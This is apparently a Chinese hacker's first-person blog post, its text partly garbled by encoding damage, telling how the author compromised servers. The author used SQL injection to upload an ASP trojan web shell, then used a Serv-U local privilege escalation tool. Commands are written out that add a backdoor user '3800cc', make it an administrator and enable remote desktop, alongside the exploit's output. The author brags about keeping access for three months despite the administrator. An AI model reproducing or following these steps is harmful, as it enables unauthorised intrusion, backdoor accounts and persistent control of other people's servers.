條件:破機(jī)器一個(gè)�,壞蛋一個(gè)(本人)����,破電信ADSL2M�,垃圾時(shí)間N多
‘()’里面的全是以后知道的�,做個(gè)注解吧!
菜鳥(niǎo)獲取肉雞��,現(xiàn)在好象都是掃描4899��。sa口令等���,其實(shí)這樣很不好��,為什么呢�����?大家的網(wǎng)絡(luò)都不是特別好���,基本上掃不出肉雞呵呵�����。我的第一個(gè)肉雞不是掃描拿的��,1.網(wǎng)絡(luò)不行運(yùn)氣不行掃不到2.工具不對(duì)
我的第一個(gè)WEBSHELL,是天意程序注入漏洞���,拿到的�,后臺(tái)廣告編輯那里可以直接上傳ASP木馬(一個(gè)木馬用了3天才學(xué)會(huì)如何操控WEBSHELL��,第一個(gè)WEBSHELL拿到的時(shí)候���,根本不知道提權(quán)是什么概念�����!放著沒(méi)幾天就丟了���,呵呵。)
第2個(gè)WEBSHELL�,也是天意注入```(那時(shí)候不容易啊,找了3天才找到第2個(gè)````中間碰到以后學(xué)到的MD5��,==)
第2個(gè)WEBSHELL拿到了�,就去網(wǎng)上各大黑客站點(diǎn)搜索:提權(quán)2個(gè)字`看了N個(gè)教程```用FTP。EXE和3389.EXE成功的開(kāi)啟了3389和創(chuàng)建管理員號(hào)���!呵呵````(補(bǔ)充知識(shí):其實(shí)管理員是用PCANYWHERE連接的���,我不知道什么是PCANYWHERE就知道別人說(shuō)什么3389肉雞���,我就當(dāng)好人,給他開(kāi)了3389呵呵�����。當(dāng)時(shí)serv-u本地提權(quán)的漏洞還不是很普及�,一般拿下webshell很容易成功,呵呵��,cmd.exe和WScriptShell默認(rèn)都可以調(diào)用���,以后就難了�,很多都是BT設(shè)置的主機(jī)���!其實(shí)大家入侵的時(shí)候���,用海洋木馬比老兵要好,我感覺(jué)他調(diào)用命令��,瀏覽文件好點(diǎn))
我來(lái)演示下怎么serv-u本地提權(quán)
E:\qipei\cn\ftp.exe "net user 3800cc 3800cc /add"(意識(shí)就是以SERV-U本地管理的權(quán)限運(yùn)行那個(gè)加用戶(hù)的命令���,SERV-U默認(rèn)的SYSTEM權(quán)限哦��!��,加一個(gè)用戶(hù)為3800cc密碼3800cc的USER權(quán)限的用戶(hù)��,最下面220一般是成功的代表)
USER LocalAdministrator
PASS
SITE MAINTENANCE
******************************************************
[+] Creating New Domain...
USER haxorcitos
PASS whitex0r
<230 User logged in, proceed.
******************************************************
[+] Now Executing: net user 3800cc 3800cc /add
<220 Domain deleted
******************************************************
接下去幾步?jīng)]什么大不了��,
E:\qipei\cn\ftp.exe "net localgroup administrators 3800cc /add"
(把3800cc這個(gè)用戶(hù)加為管理員)
還有
E:\qipei\cn\ftp.exe "E:\qipei\cn\3389.exe"
?�。ㄟ\(yùn)行E:\qipei\cn\3389.exe這個(gè)開(kāi)3389的軟件�,假設(shè)已經(jīng)開(kāi)了���,就不用運(yùn)行了���!直接連上!3389端口是可以修改的���,海洋2006可以讀取服務(wù)器相關(guān)數(shù)據(jù)
(系統(tǒng)參數(shù),系統(tǒng)磁盤(pán),站點(diǎn)文件夾,終端端口&自動(dòng)登錄)明白了吧?����。?
最后等待服務(wù)器重起��,連上3389����。這就是我的第一臺(tái)肉雞!
接下來(lái)第一臺(tái)肉雞陪了我有3個(gè)月��,管理員其實(shí)很菜�,刪了我的號(hào),我再到WEBSJELL里建立��,來(lái)來(lái)往往�,后來(lái)管理員真的瘋了一氣之下,找了個(gè)高手修補(bǔ)了漏洞���,我的第一個(gè)雞就飛了
